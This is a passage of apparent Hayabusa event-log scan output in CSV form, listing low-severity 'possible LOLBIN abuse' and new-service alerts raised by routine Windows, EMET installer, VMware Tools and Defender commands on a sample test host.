0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" 
/l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 
05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.355 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: 
C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,,New Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: 
disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy 
hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:53.121 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:04:56.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
